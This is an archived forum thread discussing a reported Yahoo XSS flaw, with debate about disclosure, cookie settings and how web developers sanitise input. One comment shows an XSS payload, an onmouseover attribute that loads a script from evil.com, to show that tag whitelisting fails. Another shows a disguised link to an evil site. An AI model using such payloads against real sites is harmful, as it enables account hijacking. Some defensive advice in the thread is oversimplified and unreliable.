Yahoo! XSS Flaw Endangers its Users

Rarely Greys writes "A major Yahoo XSS flaw makes it possible to take over any Yahoo user's account, including their mail, instant messaging, photos, etc. This is not a rare occurrence. So why aren't web sites doing more to protect their users? It's looking like most web developers don't even know or care about XSS."

Responsible disclosue?

[starwed (735423)]

There's no information here about whether Yahoo has been contacted about this (and their response if so.)

Re:

[The Hobo (783784)]

It's a lot better for the submitter to link to his own blog post and put a personal, biased opinion on the submission instead of doing what you said. You'd think that editors would strip out such biased garbage from submissions and let, you know, the community make those statements instead of reporting them as news. Then again, it's not like they've ever cared to do that.

Re:

[Simon Garlick (104721)]

You seem to have forgotten that this is Slashdot. Let me break it down for you.

Google = GOOD
Yahoo = BAD

You're welcome.

Re:

[tsa (15680)]

I think Flickr = GOOD. Now I'm confused...

Re:Responsible disclosue?

[trianglman (1024223)]

Whether it was disclosed to Yahoo directly or not, it has already been fixed (at least when I tested it in Firefox). I don't know about most of the Yahoo team, but Rasmus (the same one that invented PHP) pays very close attention to site security, and Yahoo, Google, and many others watch the boards where these vulnerabilities are revealed and fix the problems, often within hours, whether its disclosed or not.

Re:SIMPLE SOLUTION

[Delirium Tremens (214596)]

No, pairing session ID with the IP address of the client does not work. That has been known by experts for a long time.

For those who are not in the know, the problem with that particular solution attempt is that a vast majority of dialup users (AOL-ers, for example) sit behind a dynamic pool of web proxies that can have their IP address reassigned at anytime during the same dialup connection, and therefore during the same browsing session.

Re:

[quanticle (843097)]

Try to pair sessionID with IP number of accessing PC.

Two things wrong with that argument:

1. Dynamic IP addressing. Dial-up users, and DSL users often sit behind a pool of IP addresses that are handed out dynamically. This means that the user's IP could change during the middle of a session.
2. IP address spoofing. When you get the user to connect to your "evil" site for the cross site scripting vulnerability, you can record their IP address as well, allowing you to duplicate their signature by using an IP

Re:

[Crayon Kid (700279)]

No need to pick at it, it's obviously idiotic.

To get rid of XSS you need to get rid of the injection agent. Which is HTML. Period. As long as a webmail program insists on rendering HTML, eventually someone finds a new way to piggyback JavaScript on it. No matter how much they try to filter the crap out of JS. JS/ECMAScript/HTML and the browsers' support for them evolve all the time. It's a doomed effort from the start. Witness Gmail, Yahoo mail, Hotmail and so on get hit by XSS time and time again.

Re:

[AKAImBatman (238306)]

To get rid of XSS you need to get rid of the injection agent. Which is HTML. Period

You're as bad as the commenter. HTML doesn't fall into this particular problem at all. The problem is with the HTTP protocol and how it gets abused. Specifically, the article is talking about Yahoo using url rewriting to store the session id rather than a session cookie. Since the session is attached to the token in the URL, an attacker would have no problem getting access to your account from the referring URL.

This attack ex

I fail to see how is this related to XSS

[wumpus188 (657540)]

And, if I'm reading his code right, to get this to work one must have 'third party cookies' allowed in the browser... Most sane browsers have this OFF by default.

Re:I fail to see how is this related to XSS

[phantomcircuit (938963)]

You are in fact wrong. The cookie is sent through a form which is not affected by whether third party cookies are enabled or disabled. It should be noted that this flaw has already been fixed...

Not so sane or OFF in Firefox 2

[Alcoholic Synonymous (990318)]

Firefox 2 changed the way the cookie preferences worked. You can only choose to allow or disallow all cookies through the options menu. To actually block just 3rd party cookies the way you could in 1.5, you have to fool around with obscure about:config settings.

Set network.cookie.cookieBehavior to "1"

http://kb.mozillazine.org/Network.cookie.cookieBeh avior [mozillazine.org]

Oh... and NoScript...

[Alcoholic Synonymous (990318)]

The NoScript addon has Yahoo as one of their exemptions to its anti-XSS protection by default.

Re:

[Carewolf (581105)]

Most sane browsers have this OFF by default.

Does this include IE?

Yes, since IE6, I believe.

Re:I fail to see how is this related to XSS

[morgan_greywolf (835522)]

Yes, since IE6, I believe.

Um, no. Neither IE6 nor Firefox 2 block 3rd-party cookies by default. In IE6, one can turn off 3rd party cookies with Tools -> Internet Options -> Privacy Tab -> Advanced. Check override automatic cookie handling, and then under Third Party choose Block or Prompt.

In FF 2.0, you need to do an about:config and set network.cookie.cookieBehavior to 1.

Any questions?

Re:

[by Anonymous Coward]

Hm.

Posted anonymously because god knows what kind of flames I'd get if people knew I worked for an Internet advertising company that uses third-party cookies.

IE6 has third-party cookies on by default, as does IE7, as does Firefox 2. The only "major" (not major in marketshare, but in mindshare) browser that has third-party cookies disabled by default is Safari at the moment.

On the other hand, don't believe the scare tactics that say that third-party cookies are "spyware" or some horrible conspiracy against y

Re:

[VGPowerlord (621254)]

It's not what I would call "XSS" (those, I thought, had to do with code on one frame or tab accessing objects on another, and are therefore browser problems, not site problems)

As I understand XSS, it is any vulnerability that lets one inject code, usually javascript, into output from one site, causing data to be sent to another site. In my experience, it is usually caused by a site not filtering input correctly rather than a problem with a browser.

Talk about an exploit...

[C10H14N2 (640033)]

What the hell are "Penis painted" bars? /Useless without pics

Re:

[superash (1045796)]

Don't act dumb. It is no longer cute.

Ouch..

[zaunuz (624853)]

I would fall into the category of developers who did not know about this threat. How would i go about protecting the users? are there any simple guidelines that would make XSS-attacks impossible?

Re:

[Don_dumb (927108)]

I am not a web dev but I am casually learning web development and not only do I not know what XSS is (other than people mentioning it), the article doesn't actually explain what it is or how to stop such attacks. Fortunately the wikipedia page for XSS [wikipedia.org] gives a (probably too) detailed description and preventative measures.

But it would be helpful for me if someone could give a brief outline.

Re:

[Capt'n Hector (650760)]

It's the same as preventing SQL injection. If you take a user input, escape html tags before displaying them.

Re:

[zaunuz (624853)]

Im already doing that by default, so i guess im safe (for now!!)

Re:

[Fireflymantis (670938)]

Not really, Are you making damn sure, all the time, without fail that if a user changes view.php?id=32 to view.php?id=33 that they are not getting access to content they shouldn't be? What about cookies? Assuming the malicious user can (and will) build cookies of their choosing and content, are you making sure that this cannot somehow be used to hijack another users account? Are you 100% certain, that every time you read get/post/put data that it has been marked as tainted, validated, and only after it ha

Re:

[zaunuz (624853)]

1. I program the serverside so that it allways assumes that the user might be tampering with the parameters, so if any parameters are combined in a way they shouldn't be, the attemt gets logged and the session is aborted.
2. I don't use cookies
3. all characters that can be used is HTML or SQL code are delimited
4. I always assume that someone might be tampering with form data.

Im not saying that my security measures are flawless, but i do take alot of things into consideration, and i am paranoid when it c

Re:

[Capt'n Hector (650760)]

We're talking about XSS, here. It IS enough to check form data and strip html tags. Whitelist DB interactions, and you're safe 99% of the time. (And that 1% is on huge sites that are worth targeting by experienced attackers who can use the methods you just mentioned.) That Yahoo was hit by XSS is a bit embarrasing, actually.

Re:

[ensignyu (417022)]

However, you should also be aware of the related XSRF (cross-site request forgery) attack, which can actually be done from a different site. For example, someone on your site says "Hey, go to myevilsite.com", and then when you view the page it uses Javascript to auto-submit a form pointed at your site. If that form happens to be "delete account" and you don't have any protection (such as a generated form ID that only legit forms from your site would have, or requiring a password), there could be trouble.

Re:

[zaunuz (624853)]

session is automaticly aborted if HTTP_REFERRER is something else than a website on my server, or the CGI-script itself. Not really a strong way of countering such attempts, but combined with alot of other smaller things that i've implemented, it has proven useful.

Re:

[J0nne (924579)]

So those suckers that use personal firewalls that block/overwrite the referrer are blocked from using your site? You haven't seen 'Field blocked by Outpost firewall (http://www.agnitum.com)' anywhere in your logs?

Using the referrer logs for anything other than logging/statistics is a stupid thing to do, IMHO.

Re:

[zaunuz (624853)]

I gotta admit that that's an issue i haven't thought of, so thanks for telling me.
Although i haven't seen anything in the logs that hints of a firewall altering the referrer yet.

Re:

[J0nne (924579)]

Outpost alters it, but I'm certain there are some others that just block it (ie. send an empty referrer), so depending on how you wrote your site, those people might be affected too.

I personally think it's a stupid feature to add to a personal firewall, but it's there, so we have to deal with it ;).

Sanitizing user imput is the most important part

[Spliffster (755587)]

If you want to secure your systems, make sure you do not allow userinput with certain tags (assuming this input is displayed later on in a html page).

Tags like script, iframe, link, style, embed, object _MUST_ be stripped in an untrusted environment. why you may ask: script, iframe, link allow external references (for example injection of code of remote sites which you can not easily check).

script itself is the most evil tag because it allows an attacker to access any element in a page, modify it and inject further remote scripts not stored on your server.

ie interprets javascript and vbcode in style tags /me *shudders* (not sure if this is still true in IE7, in quriks-mode however i am pretty sure this still works in ie7 and non standard compliant mode AKA quirks-mode is the default for most IE only or IE targetted sites).

embed and object tags are used to insert java and activeX code, I guess I do not have to say much about those two techniques, it's again about inserting remote code at runtime.

iframe is, by nature, a fairly secure tag. it can not harm the users page much but it can be used to trick the user in believing to be on another page/site or trick him in any other way. plus, many IE versions had security holes where scripts could travel up from iframe into its parent document to manipulate data from another domain (crossite ;)

There might be some potentially evil tags missing in my list, this is just from the top of my head.

I usually go the other way, instead of restricting tags i define a white-list of tags which are useful for formatting reasons such as strong, em, front, etc. this seems to be a much more controllable way.

HTH,
-Simon

Re:Sanitizing user imput is the most important par

[Koen Deforche (1086431)]

Although sanitizing user input gets the job done, what one should be doing is sanitizing the output .

An XSS attack exists because you are dynamically generating a web page with content you didn't intend: which contains executable script instead of where you intended dumb text (that you got from a database or that was entered earlier on by a (another) user). Sanitizing user input (which is the only factor you don't control) will help but if I enter <script>1+1</script> as some comment on for ex

Re:Sanitizing user imput is the most important par

[Mr_Icon (124425)]

I usually go the other way, instead of restricting tags i define a white-list of tags which are useful for formatting reasons such as strong, em, front, etc. this seems to be a much more controllable way.

<strong onmouseover="document.write('<' + 'script s' + 'rc=\"http://evil.com/foo.js\"></script>')">You get the idea</strong>

HTML sanitizing is VERY. HARD. Unless you first run things through tidy, and then manually check all attributes for evil (keeping in mind URL-encoded and unicode-escaped sequences), you WILL FAIL.

You are a lot safer using wiki or REST syntax and converting it to html formatting tags on the back-end. Otherwise you'll be playing a constant game of whack-a-mole.

Re:

[Slashdot Parent (995749)]

i would disallow all attributes by default (forgot to mention).

Makes the <a> tag kind of useless, eh?

Not necessarily that they don't try.

[Fireflymantis (670938)]

As a web developer myself, I try dillagently to kill off any XSS attacks by writing good secure code, but there will always be a few corner cases in any non-trivial application that one does not count for. This is doubly so when dealing with web services that have to pump out huge amounts of data over an insecure medium.

What is most showing is how fast it will be till Yahoo fixes this vunerability as a sign of their metal.

imho...

Why web developers don't care about XSS

[laffer1 (701823)]

Could it be that web developers have to create Web 2.0 applications that take all sorts of evil input? How do you make blogs, tags, message boards, and things 100% safe? I wish security researchers would create a proof of concept site that was a REAL web application to show best practices. Sure there are projects like http://www.owasp.org/ [owasp.org], but their example code is near useless for most languages they have up.

Think about the input needed for a comment box. You have to deal with i18n issues. UTF-8 or UTF-16 is a very big character set. You can't explicitly block everything and then white list selectively very easily with such a big character set.

Some people think bbcode is the solution for some types of sites. I haven't seen too many implementations of bbcode for languages other than PHP that are open source and reusable.

Can someone point me at resources for Java and .NET development? I don't use PHP very often. Are there any resources for other languages like perl, python and ruby?

I'd personally love to get a library to do safe HTML input while stripping any dangerous tags in Java that is reasonably reusable.

Re:

[Goaway (82658)]

BBcode is ugly, cryptic and pointless. It's just as hard to use for users as HTML, so nothing is gained on that side, and if you're parsing something that's largely equivalent to HTML, why not just parse HTML in the first place? There's nothing magic about BBcode, and you could just as well replace the BBcode tags with HTML tags in your parser and have the same level of security (judging by the number of XSS exploits found in various BBcode implementations, not all that much, really) but with slightly more

Web developers know not enough about security

[PsyQo (1020321)]

In my opinion web developers just don't know enough about security.

They know how to store and retrieve data from a database, but they don't know why it's important to escape strings before they go to into a SQL query (or better: use parameterized queries). It happens too often that when you see some page: view.php?id=23 and you change 23 to 23', it returns an error. Although a lot of developers are 'saved' by PHP's magic quotes, it isn't a silver bullet.

Even less web developers seem to know about XSS and how to prevent it.

Web security should get a lot more attention in web developer education, from SQL injection to XSS to salted hashes.

I'd care less if it was site developers problem...

[zukinux (1094199)]

The real problems today are using ActiveX in Internet Explorer.
Believe it or not, most malware,spyware,viruses spread to the user via Internet Explorer ActiveX.

Although users are prompted to click yes or no, the default user will click yes anyway, and that's even a bigger problem.

Use some library/package or something

[cerberusss (660701)]

It's not a shame to admit you know zilch about XSS. But at least use a library/package/class or something which prevents these flaws. For instance for the PHP developers, there is HTML_Form [php.net], which includes a unique hidden form field each time a form is generated thus preventing some XSS.

Re:

[spectrokid (660550)]

The project you point to has a stable release > two years old and a white screen under "roadmap". Isn't this a big part of the problem: security should (specially for small deployments) be largely of the shelf, based on good toolkits, but it is not considered "sexy" to program these (parts of the) toolkits? I mean, how many ways are there to present a form on a website? It shouldn't be rocket technology to make one that says: "make sure the user entered a valid date here before throwing it on the data

Here's Why.

[by Anonymous Coward]

Well, my take (multiple major webdev projects on the go NOW)...

1. MOVING TARGET

A lot of webdev security issues (DB input, etc.) are moving targets.

For example, take database input. Ten years ago, for many (beginning) developers, escaping quotes and backslashes manually was considered fine. Later developers had database libraries that provided these functions natively. All of a sudden, unicode came along. Suddenly you had to worry about extra characters. This was another step - for example, for developers using MySQL, it was pertinent to change all of your escape functions to a new, unicode-aware one.

With everything else on their plate, even if they're single-language developers, auditing old code to maintain current security best practice falls somewhere at the bottom of the todo list, between 'get some exercise' and 'catch up on sleep'.

2. EXPECTATIONS RISING

As individual leading sites like google's gmail or google earth appear, expectations from clients increase. Web developers have a hard time keeping up with meeting all of the new 'standard features' that are expected, and are often implementing certain aspects for the first time, relying on either poorly audited code (random downloaded scripts) or writing their own with insufficient time for testing and security auditing.

3. NEW OR RAPIDLY ELEVATED ISSUES IN WEB SECURITY

In the last ten years, issues have appeared such as:
  1. Public tools and worms that can easily attack custom-made applications, rendering some older, unmaintained code more readily exploitable. (This is just another time pressure, and security is all about the combination of resources for the attacker and defender... not just technical know-how on either side.)

  2. Cross site scripting... this is quite a complex issue and is not understood by all developers.

  3. A large number of scripting languages, which are constantly being updated and take a lot of time to stay up to date with. For example, most web developers are not really competent with javascript/ecmascript...

  4. Browser or other 'out of web developer control' bugs can make different tags or features dangerous 'at short notice'.

  5. AJAX and web services, which emphasise providing structured, easily-accessible data to the public, make data scraping (ala screen scraping) that much more of a real and widespread threat. As of today, most developers still do not take this threat seriously.

  6. Denial of service attacks.

  7. New expectations of server-side image (or web services data) processing can expose extra code (often legacy tools, or tools in entirely new languages) to potentially hostile input.

4. GENERAL PROGRAMMING ISSUES

Add to the above the standard pressures that lead to security shortfalls:
  - Web developers, like other programmers, are often lumbered with unrealistic delivery timeframes.

  - A lot of webdev is single-developer stuff, not completed in teams. As only one person reads the code, errors are less likely to be spotted.

  - Most webdev projects have no budget for code auditing as close-to-secure code is often merely a desirable part of the overall bundle, not a steadfast client requirement...

  - Webdev people often aren't client facing. In today's highly comepetitive webdev market, client facing salespeople perhaps don't know enough about code security to sell it as a budget-worthy extra.

5. CLIENTS DONT CARE

They want a working site, not a working site with n^m behind-the-scenes feelgood features they have to take at face value and have no way to 'see', 'show the boss' or otherwise justify.

Re:

[Riquez (917372)]

Very well put, you should've logged in because you deserve the karma for this more than most.

I particularly empathise with #4.
Unrealistic deadlines: I'm often asked to complete a job that should take 8-10 days in 3. Even then, my 10 day estimate is not including high-level security features. When you explain "if I do it in 3 days, & you want it changed later I'll have to start again from scratch. Plus, it will be minimum security - please understand that the website *may* be raped" THEY say "Bahh,

XSS?

[bar-agent (698856)]

What's XSS?

Eh, never mind. I don't really care.

Re:

[RuBLed (995686)]

so do I... but what I really care about is that the blog lacks Cute Ponies 2.0 (tm)

Paris Hilton?!

[tsa (15680)]

I stopped reading right after the bit about Paris Hilton. If you need her to keep your audience reading your article then either you are a bad writer or I am not the target audience.

Are XSS flaws overrated?

[Vexorian (959249)]

There is certainly no excuse for web developers not to validate output correctly, but how big of an issue XSS actually is? This one vulnerability requires you to make an user click an odd link, and it took yahoo almost no time to fix it, how many hackers are so good at social engineering that would be able to take advantage of this?

Bottom line: Developers don't care

[MobyDisk (75490)]

It's looking like most web developers don't even know or care about XSS

I think the summary was trolling, but even so they got it dead on.

I've worked on several web projects over the years, and I've never met a single developer who even knew or cared about XSS. In all of those projects none of them, other than myself, bothered to even escape strings when sending out to HTML. In some cases, they will go out of their way to _not_ escape them. Like in ASP.NET, using HTML literal controls (which don't escape HTML content) instead of using text controls (which do). The reasoning was that the .000001% optimization it provides is more important than the risk of a security problem.

Re:Idiot Consumers?

[Fireflymantis (670938)]

more correctly (If I read the overly pink article right), it is the reliance that someone will click on something like this:

----
OMG! Check out this funny search!

"French military victories"
<a href='evilsite.com/haxzoryouryahoo.cgi'>http://sea rch.yahoo.com/search?p=french+military+victories$l t;/a>

HAHAHA! Couldn't stop laughing...
----